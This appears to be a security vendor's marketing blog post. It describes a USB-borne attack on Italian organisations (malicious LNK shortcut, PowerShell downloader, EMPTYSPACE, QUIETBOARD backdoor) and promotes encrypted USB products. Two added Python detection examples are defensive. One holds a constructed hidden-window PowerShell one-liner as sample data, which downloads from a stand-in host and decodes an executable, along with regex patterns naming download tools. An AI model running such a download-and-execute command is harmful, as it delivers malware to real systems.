Organizations globally, with Italy being no exception, are facing a surge in cyber threats. Most USB cyberattacks possess the capability to disrupt operational technology. These attacks, orchestrated by financially motivated threat actors, deploy weaponized USB devices to disseminate cryptojacking malware.
Weaponized USB attacks represent a particularly insidious form of cyber threat, as they leverage physical devices that are commonly used and easily overlooked. Once inserted into a system, these malicious USB devices can quickly infect computers and networks, often without the user’s knowledge or consent. The payload of such attacks typically includes cryptojacking malware, which covertly hijacks the victim’s computing resources to mine cryptocurrencies for the benefit of the attackers.
This article delves into the intricacies of these assaults, shedding light on the workings of cryptojacking malware, and the critical need for proactive measures to safeguard against such attacks.
Details of the Attack
UNC4990, a financially motivated threat actor, employs weaponized USB devices as the primary method to infiltrate organizations across various sectors in Italy. Let us explore the attack in detail.
USB Infection
The attack begins with the widespread distribution of infected USB devices. These devices contain malicious files intended to exploit vulnerabilities in the target systems.
Deployment of EMPTYSPACE Downloader
Upon connecting the infected USB device, victims inadvertently trigger the execution of a malicious LNK shortcut file. This action initiates a PowerShell script that downloads and decodes the EMPTYSPACE downloader.
Downloader Execution
The EMPTYSPACE downloader, once activated, proceeds to fetch additional payloads from third-party websites such as GitHub, Vimeo, and Ars Technica. These payloads are crucial for the subsequent stages of the attack.
Payload Retrieval
The downloader serves as a conduit for retrieving next-stage payloads from a command-and-control (C2) server. One of the primary payloads deployed is a backdoor known as QUIETBOARD.
QUIETBOARD Backdoor
Upon successful deployment, the QUIETBOARD backdoor establishes unauthorized access to the victim’s system. This backdoor enables threat actors to execute commands, exfiltrate data, or deploy further malware.
Utilization of Popular Sites
The malware utilizes legitimate and widely used websites for hosting malicious payloads. This tactic poses a significant challenge for detection and mitigation efforts, as the malicious activities may go unnoticed within the vast volume of legitimate traffic.
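The steps above (shortcut on the USB drive, PowerShell launched by the double-click, download and decode of the next stage) leave a distinctive footprint in process-creation telemetry. The following is an added example, not code from this article or from DataLocker, showing one way a defender can score such events. Field names follow Sysmon Event ID 1, the event values are constructed sample data rather than real indicators, and the set of removable drive letters is assumed to come from the collector and is passed in explicitly.

```python
"""Added example (not code from the article or from DataLocker): scoring
process-creation events for the USB shortcut -> PowerShell -> download/decode
chain. Field names follow Sysmon Event ID 1; all values are constructed."""
import re

POWERSHELL_IMAGES = ("powershell.exe", "pwsh.exe")

# Download primitives commonly seen in one-line droppers.
DOWNLOAD_RE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b|Start-BitsTransfer",
    re.IGNORECASE,
)
# Decoding of a fetched payload, or an encoded command (-e / -ec / -enc / -EncodedCommand).
DECODE_RE = re.compile(r"FromBase64String|-e(?:nc|ncodedcommand|c)?\b", re.IGNORECASE)
# Switches that rarely appear in legitimate interactive use.
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden|-e(?:xecutionpolicy|p)\s+bypass", re.IGNORECASE)

# Constructed sample telemetry (not real indicators).
SAMPLE_EVENTS = [
    {   # constructed: the shortcut-launched download-and-decode chain
        "ProcessId": 4120,
        "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "ParentImage": "C:\\Windows\\explorer.exe",
        "CurrentDirectory": "E:\\",
        "CommandLine": (
            "powershell.exe -w hidden -ep bypass -c "
            "$d=(New-Object Net.WebClient).DownloadString('https://stage.example.invalid/p');"
            "[IO.File]::WriteAllBytes('C:\\Users\\Public\\u.exe',[Convert]::FromBase64String($d))"
        ),
    },
    {   # constructed: a scheduled inventory script, benign
        "ProcessId": 5210,
        "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "ParentImage": "C:\\Windows\\System32\\svchost.exe",
        "CurrentDirectory": "C:\\Windows\\System32\\",
        "CommandLine": "powershell.exe -NoProfile -File C:\\Scripts\\inventory.ps1",
    },
    {   # constructed: a document opened from the same USB drive, benign
        "ProcessId": 6001,
        "Image": "C:\\Program Files\\Editor\\editor.exe",
        "ParentImage": "C:\\Windows\\explorer.exe",
        "CurrentDirectory": "E:\\",
        "CommandLine": "\"C:\\Program Files\\Editor\\editor.exe\" E:\\notes.txt",
    },
    {   # constructed: an administrator downloading a tool from a console, benign
        "ProcessId": 7300,
        "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "ParentImage": "C:\\Windows\\System32\\cmd.exe",
        "CurrentDirectory": "C:\\Users\\alice\\",
        "CommandLine": "powershell.exe -c Invoke-WebRequest https://updates.example.invalid/tool.zip -OutFile tool.zip",
    },
]


def _basename(path):
    """Last path component, lower-cased, for image comparisons."""
    return path.rsplit("\\", 1)[-1].lower()


def score_event(event, removable_drives):
    """Return the reasons an event matches the chain; [] when it does not.

    At least two independent signals are required, so that an administrator's
    plain download command on its own does not raise an alert."""
    if _basename(event.get("Image", "")) not in POWERSHELL_IMAGES:
        return []
    reasons = []
    cmd = event.get("CommandLine", "")
    cwd = event.get("CurrentDirectory", "").upper()
    if _basename(event.get("ParentImage", "")) == "explorer.exe":
        reasons.append("launched by explorer.exe (double-clicked shortcut)")
    if any(cwd.startswith(d.upper()) for d in removable_drives):
        reasons.append("working directory on removable drive " + cwd[:2])
    if DOWNLOAD_RE.search(cmd):
        reasons.append("download primitive in command line")
    if DECODE_RE.search(cmd):
        reasons.append("base64/encoded-command decoding in command line")
    if HIDDEN_RE.search(cmd):
        reasons.append("hidden window or execution-policy bypass")
    return reasons if len(reasons) >= 2 else []


def find_suspicious(events, removable_drives):
    """Map ProcessId -> reasons for every flagged event."""
    result = {}
    for event in events:
        reasons = score_event(event, removable_drives)
        if reasons:
            result[event["ProcessId"]] = reasons
    return result


if __name__ == "__main__":
    for pid, reasons in find_suspicious(SAMPLE_EVENTS, {"E:"}).items():
        print(pid, "->", "; ".join(reasons))
```

Only the first event is flagged: it combines all five signals, while the inventory script and the console download each carry at most one. The two-signal threshold is the tunable part; lowering it trades false positives for earlier coverage of variants that drop one of the evasion switches.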
Understanding Cryptojacking Malware
Cryptojacking malware, such as QUIETBOARD, is designed to covertly hijack computing resources to mine cryptocurrencies without the user’s consent. In addition to mining cryptocurrencies, QUIETBOARD is equipped with various features, including executing arbitrary commands, altering crypto wallet addresses, propagating the malware to removable drives, taking screenshots, and gathering system information.
Execution of Arbitrary Commands
Some variants of cryptojacking malware, including QUIETBOARD, possess the capability to execute arbitrary commands on the infected system. This functionality allows threat actors to remotely control the compromised devices for various malicious purposes.
Wallet Address Alteration
Cryptojacking malware may also tamper with cryptocurrency wallet addresses stored on the victim’s system. By replacing legitimate wallet addresses with those controlled by the attackers, they can redirect mined cryptocurrency to their own wallets, depriving the legitimate owners of their earnings.
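The article does not say how QUIETBOARD swaps wallet addresses. The added example below, which is not code from this article or from DataLocker, assumes the common "clipper" mechanism, in which malware watches the clipboard and replaces a copied address with one it controls, and shows how an endpoint agent could spot it from a stream of clipboard snapshots. The snapshot format, the address patterns and the five-second window are all assumptions; the sample addresses are constructed and belong to no real wallet.

```python
"""Added example (not code from the article or from DataLocker): detecting
clipboard wallet-address substitution from a history of clipboard changes.
A substitution shows up as two different addresses of the same family
appearing back to back within a fraction of a second, which a person copying
two recipients almost never does."""
import re
from dataclasses import dataclass

# Address shapes for two common targets; the Bech32 charset is approximated as [a-z0-9].
ADDRESS_FAMILIES = {
    "btc": re.compile(r"^(?:bc1[a-z0-9]{25,87}|[13][a-km-zA-HJ-NP-Z1-9]{25,34})$"),
    "eth": re.compile(r"^0x[0-9a-fA-F]{40}$"),
}


@dataclass(frozen=True)
class ClipboardEvent:
    t: float      # seconds since the agent started (assumed collector field)
    content: str  # clipboard text after the change


def address_family(text):
    """Return 'btc', 'eth', or None for text that is not a recognised address."""
    text = text.strip()
    for name, pattern in ADDRESS_FAMILIES.items():
        if pattern.match(text):
            return name
    return None


def detect_substitutions(events, window=5.0):
    """Return one alert per pair of consecutive clipboard changes in which a
    valid address is replaced by a different address of the same family
    within `window` seconds."""
    alerts = []
    ordered = sorted(events, key=lambda e: e.t)
    for prev, cur in zip(ordered, ordered[1:]):
        fam = address_family(prev.content)
        if fam is None or address_family(cur.content) != fam:
            continue
        if prev.content.strip() == cur.content.strip():
            continue
        if cur.t - prev.t > window:
            continue
        alerts.append({
            "t": cur.t,
            "family": fam,
            "expected": prev.content.strip(),
            "observed": cur.content.strip(),
        })
    return alerts


# Constructed sample addresses and clipboard history (not real wallets).
ETH_A = "0x" + "1234567890abcdef" * 2 + "12345678"
ETH_B = "0x" + "deadbeef" * 5
BTC_A = "1ExampAddrConstructedForDemo1234567"
BTC_B = "3AnotherConstructedDemoAddr98765432"
SAMPLE_HISTORY = [
    ClipboardEvent(0.0, "agenda for Tuesday"),
    ClipboardEvent(10.0, ETH_A),    # user copies the intended recipient
    ClipboardEvent(10.2, ETH_B),    # 200 ms later the clipboard holds a different address
    ClipboardEvent(100.0, BTC_A),
    ClipboardEvent(300.0, BTC_B),   # a second recipient copied minutes later: benign
]

if __name__ == "__main__":
    for alert in detect_substitutions(SAMPLE_HISTORY):
        print(f"t={alert['t']}: {alert['family']} address changed "
              f"from {alert['expected']} to {alert['observed']}")
```

The same check is worth running on the wallet address a miner or payment tool actually uses at start-up, comparing it against the value the operator configured, since substitution in a configuration file shows up as the same "different address of the same family" pattern.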
Propagation via Removable Drives
Certain cryptojacking malware strains, like QUIETBOARD, have the ability to spread to other devices through removable drives. When a removable drive infected with the malware is connected to another system, it may automatically execute and propagate the infection, expanding the malware’s reach.
Screenshot Capture
A few cryptojacking malware strains incorporate functionality to capture screenshots of the attacked system. This feature enables attackers to gather sensitive information, such as login credentials or financial data, for further exploitation.
System Information Gathering
Cryptojacking malware often includes mechanisms to collect detailed information about the compromised system. This data may include hardware specifications, operating system details, network configurations, and installed software. Gathering such information helps attackers assess the system’s capabilities and potential vulnerabilities for exploitation.
Proactive Prevention Measures
To combat such sophisticated threats, organizations need to adopt a proactive approach to cybersecurity. Encrypted hardware and software solutions, such as those offered by DataLocker, play a crucial role in preventing USB-based attacks. By employing FIPS 140-2 compliant encryption and device management capabilities, DataLocker ensures that USB devices remain secure and protected against malicious activities.
Encrypted Hardware Solutions
DataLocker provides a range of encrypted hardware solutions designed to safeguard sensitive data stored on USB devices. They are FIPS 140-2 compliant, meeting the rigorous security requirements mandated by government and industry regulations. By encrypting data at rest, DataLocker’s hardware solutions mitigate the risk of unauthorized access and data breaches, even if the device falls into the wrong hands.
Centralized Device Management
DataLocker’s SafeConsole software offers centralized device management, empowering organizations to implement granular security policies, enforce data encryption standards, and track device usage across the entire organization. Through the centralized management interface, administrators can remotely wipe lost or stolen devices, revoke access privileges, and ensure compliance with data protection regulations.
Check out our product demo to see the efficiency of DataLocker products and solutions.
Safeguarding Businesses Against Evolving Threats with DataLocker
The recent surge in USB-based attacks targeting Italian businesses underscores the evolving nature of cyber threats. As threat actors continue to employ sophisticated tactics, it is imperative for organizations to remain vigilant and adopt robust cybersecurity measures. By leveraging encrypted USB devices and implementing proactive security strategies, businesses can effectively mitigate the risks posed by cryptojacking malware and other cyber threats.
DataLocker offers a comprehensive solution with its encrypted USB devices and centralized USB device management platform. By implementing DataLocker’s encrypted solutions, organizations can effectively mitigate the risks posed by cryptojacking malware and other cyber threats. Wait no more! Reach out to us to protect your business against potential threats.